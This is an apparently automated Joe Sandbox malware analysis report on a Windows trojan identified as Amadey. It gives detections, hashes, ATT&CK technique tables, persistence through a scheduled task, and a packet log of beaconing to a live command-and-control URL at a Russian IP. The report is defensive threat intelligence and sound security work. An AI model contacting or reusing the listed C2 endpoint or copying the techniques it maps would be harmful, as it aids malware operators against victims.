                    Source: Yara match File source: 2.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000003.1640045336.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000003.1665651650.0000000004990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000007.00000003.2319286062.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.1720834507.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.1706078385.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1680219093.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000003.1680559275.0000000005660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 741 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 224 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Source | Detection | Scanner | Label | Link
gNo9ad9KO4.exe | 51% | Virustotal | | Browse
gNo9ad9KO4.exe | 100% | Avira | TR/Crypt.TPM.Gen |
gNo9ad9KO4.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | 100% | Avira | TR/Crypt.TPM.Gen |
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | 51% | Virustotal | | Browse

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://77.91.77.82/Hun4Ko/index.phpC | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.phpa | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.phpM | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.phpT | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.phpft | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.phpk | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.php | 100% | Avira URL Cloud | phishing |
http://77.91.77.82/Hun4Ko/index.phpW | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.phpM | 22% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.phpT | 22% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.phpC | 23% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.php | 24% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.phpa | 21% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php | 100% | Avira URL Cloud | phishing |
http://77.91.77.82/Hun4Ko/index.phpk | 21% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.phpW | 21% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.phpu | 0% | Avira URL Cloud | safe |
http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php | 22% | Virustotal | | Browse
http://77.91.77.82/Hun4Ko/index.phpu | 21% | Virustotal | | Browse
                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://77.91.77.82/Hun4Ko/index.php | true | 24%, Virustotal, Browse; Avira URL Cloud: phishing | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://77.91.77.82/Hun4Ko/index.phpT | explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | false | 22%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpC | explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp | false | 23%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpft | explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpa | explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp | false | 21%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpM | explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp | false | 22%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpk | explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp | false | 21%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpW | explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp | false | 21%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k | explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php | explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp | true | 22%, Virustotal, Browse; Avira URL Cloud: phishing | unknown
http://77.91.77.82/Hun4Ko/index.phpu | explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp | false | 21%, Virustotal, Browse; Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
77.91.77.82 | unknown | Russian Federation | | 42861 | FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467935
                    Start date and time:2024-07-05 05:08:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 31s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:gNo9ad9KO4.exe
                    renamed because original name is a hash value
                    Original Sample Name:c2197d56f08530af4a35733cda8cd2fd.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target explorti.exe, PID 7448 because there are no executed function
                    • Execution Graph export aborted for target explorti.exe, PID 7564 because there are no executed function
                    • Execution Graph export aborted for target gNo9ad9KO4.exe, PID 7256 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:08:56 | Task Scheduler | Run new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
23:10:01 | API Interceptor | 851x Sleep call for process: explorti.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
77.91.77.82 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | So7a8eQerR.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82/Hun4Ko/index.php
                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82
 | So7a8eQerR.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.81
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.81
 | file.exe | Get hash | malicious | Clipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRAT | Browse | 77.91.77.180
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.81
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.81
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82
 | file.exe | Get hash | malicious | Amadey, Mars Stealer, Stealc, Vidar | Browse | 77.91.77.82
 | file.exe | Get hash | malicious | Clipboard Hijacker, PureLog Stealer, RisePro Stealer | Browse | 77.91.77.180
                    No context
                    No context
                    Process:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1894912
                    Entropy (8bit):7.949850570104973
                    Encrypted:false
                    SSDEEP:49152:5mv1X+giwFocOUfZI3wQbUrtCwwybCEd8:5K1W6bIUgwveE
                    MD5:C2197D56F08530AF4A35733CDA8CD2FD
                    SHA1:EF37D065F5AB7ACBE071150DE940778AD7E80BB5
                    SHA-256:30EB98D8A7A54537B4352F78B44BE53109F3CD82577FA0C9B378BDE020E2890B
                    SHA-512:CD4FC1C8D4043C52B0F190D3D0F7EDE9E2F184E16B3051CB3CC2A55D4205F011F53267BE6F41C2CAC28C9DC998EAD5F8AEB1847C038E66018ED3378A640C1F98
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Virustotal, Detection: 51%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................J...........@...........................K......i....@.................................X...l...........................8.J..............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .0*.........................@...adkjkfkz......0.....................@...afyvsewm......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288
                    Entropy (8bit):3.4620007010637344
                    Encrypted:false
                    SSDEEP:6:6YJtX4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0l1r7zt0:1JZ4RKQ13vg7jzvYRQV1r7zt0
                    MD5:D20F0185BD52EB5BDA558B287BF75755
                    SHA1:B063B92974FFECAB303C9BFA00B72C4E52D4E0BA
                    SHA-256:B22FF96DE01E45AA5E58514CE7A376777898025BDF54E0B6D613602C93ACDE25
                    SHA-512:737A8A98FF2A7A997DA0F9DE81561B747C4A0077DDDFA32E947F144D91B8FCF47B197F7EFDF2C388743D47ED15825E93E9D6E693957AF29F53A4703224393F5A
                    Malicious:false
                    Reputation:low
                    Preview:....H.+.^..K....#.VF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.949850570104973
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:gNo9ad9KO4.exe
                    File size:1'894'912 bytes
                    MD5:c2197d56f08530af4a35733cda8cd2fd
                    SHA1:ef37d065f5ab7acbe071150de940778ad7e80bb5
                    SHA256:30eb98d8a7a54537b4352f78b44be53109f3cd82577fa0c9b378bde020e2890b
                    SHA512:cd4fc1c8d4043c52b0f190d3d0f7ede9e2f184e16b3051cb3cc2a55d4205f011f53267be6f41c2cac28c9dc998ead5f8aeb1847c038e66018ed3378a640c1f98
                    SSDEEP:49152:5mv1X+giwFocOUfZI3wQbUrtCwwybCEd8:5K1W6bIUgwveE
                    TLSH:7B9533289347395BC39D1C73A2A3471BF7788DC706EBAC783A50271569D32246ACB7C6
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x8ad000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x6661EA84 [Thu Jun 6 16:57:40 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a058 | 0x6c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4aaf38 | 0x10 | adkjkfkz
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4aaee8 | 0x18 | adkjkfkz
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x68000 | 0x2dc00 | 3d14346fcff343129bf069242c2f65cb | False | 0.9984631147540983 | data | 7.988500981589288 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0x1e0 | 0x200 | bb1d3aee5efd0fd8cc96a30c6a560f48 | False | 0.576171875 | data | 4.486579218469371 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6a000 | 0x1000 | 0x200 | 6e66ae8f9a75bc604a087c954abf8737 | False | 0.15234375 | data | 1.0684380430289213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x6b000 | 0x2a3000 | 0x200 | e18cd50480d5e8e1c31717cd29ad2de9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
adkjkfkz | 0x30e000 | 0x19e000 | 0x19d200 | c8fc1144ea0fa1ea829e3491092afef1 | False | 0.9944319686081694 | data | 7.953327902515579 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
afyvsewm | 0x4ac000 | 0x1000 | 0x400 | ac9eff5932ff932e45903377564b2e1b | False | 0.828125 | data | 6.4192908878038475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4ad000 | 0x3000 | 0x2200 | 534f3aee2a1a976ef32f0f39410a17f1 | False | 0.06158088235294118 | DOS executable (COM) | 0.7250773113842407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4aaf48 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727

DLL | Import
kernel32.dll | lstrcpy

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/05/24-05:10:03.058996 | TCP | 2856147 | ETPRO TROJAN Amadey CnC Activity M3 | 49737 | 80 | 192.168.2.4 | 77.91.77.82
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 5, 2024 05:10:08.332531929 CEST4974280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:08.332653999 CEST4974280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:08.332778931 CEST804974177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:08.332834005 CEST4974180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:08.337378979 CEST804974277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:09.050707102 CEST804974277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:09.054861069 CEST4974280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.055381060 CEST4974280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.060126066 CEST804974277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:09.282841921 CEST804974277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:09.286757946 CEST4974280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.388837099 CEST4974280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.389148951 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.393970013 CEST804974377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:09.393987894 CEST804974277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:09.394073009 CEST4974280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.394092083 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.394258976 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:09.403717041 CEST804974377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:10.092967033 CEST804974377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:10.093030930 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.094006062 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.098809004 CEST804974377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:10.310858011 CEST804974377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:10.310924053 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.420135975 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.420430899 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.425348997 CEST804974477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:10.425422907 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.425515890 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.425518990 CEST804974377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:10.425570011 CEST4974380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:10.430280924 CEST804974477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:11.117185116 CEST804974477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:11.118777037 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.119334936 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.124195099 CEST804974477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:11.337167025 CEST804974477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:11.337248087 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.452963114 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.453314066 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.458137989 CEST804974577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:11.458374977 CEST804974477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:11.458461046 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.458462000 CEST4974480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.458595991 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:11.470412016 CEST804974577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:12.202783108 CEST804974577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:12.202862024 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.203501940 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.208291054 CEST804974577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:12.433974981 CEST804974577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:12.434134960 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.545006990 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.545344114 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.550228119 CEST804974677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:12.550291061 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.550329924 CEST804974577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:12.550375938 CEST4974580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.550483942 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:12.555223942 CEST804974677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:13.255688906 CEST804974677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:13.255759001 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.256418943 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.261204958 CEST804974677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:13.475923061 CEST804974677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:13.476011038 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.591912031 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.592235088 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.597028971 CEST804974677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:13.597516060 CEST804974777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:13.597656965 CEST4974680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.597717047 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.598210096 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:13.602988958 CEST804974777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:14.309160948 CEST804974777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:14.309225082 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:14.310110092 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:14.314889908 CEST804974777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:14.533269882 CEST804974777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:14.533324003 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:14.638802052 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:14.639229059 CEST4974880192.168.2.477.91.77.82
